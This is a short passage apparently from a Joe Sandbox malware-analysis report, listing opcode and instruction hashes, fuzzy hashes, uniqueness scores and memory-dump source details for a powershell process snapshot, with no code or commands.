          • Opcode ID: dcff2424a7e042d012f598d3ccd7c2a1f6e66f488c047b4e3ce0304ca31af976
          • Instruction ID: 4686d6961f0fc3d086655517b48a82ec2878197e332cd3b8ea4dee1ae9ff6d08
          • Opcode Fuzzy Hash: dcff2424a7e042d012f598d3ccd7c2a1f6e66f488c047b4e3ce0304ca31af976
          • Instruction Fuzzy Hash: 93429430618A8B4FEBA6DF2884947F97BD1FF59300F5440BAD84EC72A3DE78A9458741
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000002.00000002.423250356.000007FF00290000.00000040.00000001.sdmp, Offset: 000007FF00290000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ff00290000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: af324110c4b386ccd6098feee6b2ad84da25d30956d73270040d48d21dc91d34
          • Instruction ID: ec5974d7fcea5a7e9ad8240392fa4fe72344627335f1d5a799479f6507726cba
          • Opcode Fuzzy Hash: af324110c4b386ccd6098feee6b2ad84da25d30956d73270040d48d21dc91d34
          • Instruction Fuzzy Hash: 8051306000E3C15FE3430B74C869AA2BFA5DF17510F4E85D9E0C58F4A3EA99865ACB92
          Uniqueness

          Uniqueness Score: -1.00%